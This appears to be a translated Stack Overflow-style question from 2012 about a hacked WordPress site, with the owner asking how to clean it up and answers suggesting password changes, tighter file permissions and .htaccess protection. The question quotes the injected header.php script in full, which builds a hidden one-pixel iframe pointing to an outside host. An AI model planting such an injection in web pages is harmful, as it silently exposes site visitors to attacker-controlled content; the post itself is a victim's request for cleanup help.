【问题标题】:Wordpress hack injects javascript / iframesWordpress hack 注入 javascript / iframe
【发布时间】:2012-12-12 17:14:26
【问题描述】:

我的(Wordpress)网站似乎被黑了,代码被添加到主 index.php 文件、主题 index.php 文件和主题 header.php 文件中。

这部分来自header.php

#f524d6#
<script type=\"text/javascript\" language=\"javascript\" >
(function () {    var kilun = document.createElement('iframe');    kilun.src = 'http://hosting3081247.az.pl/cgi-bin/counter.php';    kilun.style.position = 'absolute';    kilun.style.border = '0';    kilun.style.height = '1px';    kilun.style.width = '1px';    kilun.style.left = '1px';    kilun.style.top = '1px';    if (!document.getElementById('kilun')) {        document.write('<div id=\'kilun\'></div>');        document.getElementById('kilun').appendChild(kilun);    }})();</script>";
#/f524d6#

谁能告诉我如何删除它?删除代码行后返回。

【问题讨论】:

  • 更改文件的权限以使 PHP 无法编写它,删除代码,然后检查错误日志以了解哪个文件无法打开它。 (它可能不起作用,但值得一试。)
  • 不仅仅是 Wordpress。今天早上我在我的网站上找到了这个。经过搜索,我发现许多其他网站都有相同的代码,尽管有波兰、斯洛伐克和瑞典的地址参考。我的密码被更改了,文件被清理了,一个早上的时间都丢失了。我很想知道是否有人确定了这些网站试图做什么。

标签: wordpress virus


【解决方案1】:

如果你在普通的 html/php 页面上找到它——不仅在 wordpress 中——那么它可能是一个解析服务器上所有文件的脚本(即不是 wp hack),在这种情况下最好更改服务器的用户名和密码(以及对于 wordpress):ftp、shell 等。

【讨论】:

    【解决方案2】:
    • 以最低权限更改您的文件夹和文件。
    • 保护您的.htaccess。
    • 检查文件夹所有权。
    • 更改所有密码并创建更难的密码。

    【讨论】:

      猜你喜欢
      • 1970-01-01
      • 2013-04-18
      • 1970-01-01
      • 1970-01-01
      • 1970-01-01
      • 1970-01-01
      • 2016-11-04
      • 1970-01-01
      • 2012-08-30
      相关资源
      最近更新 更多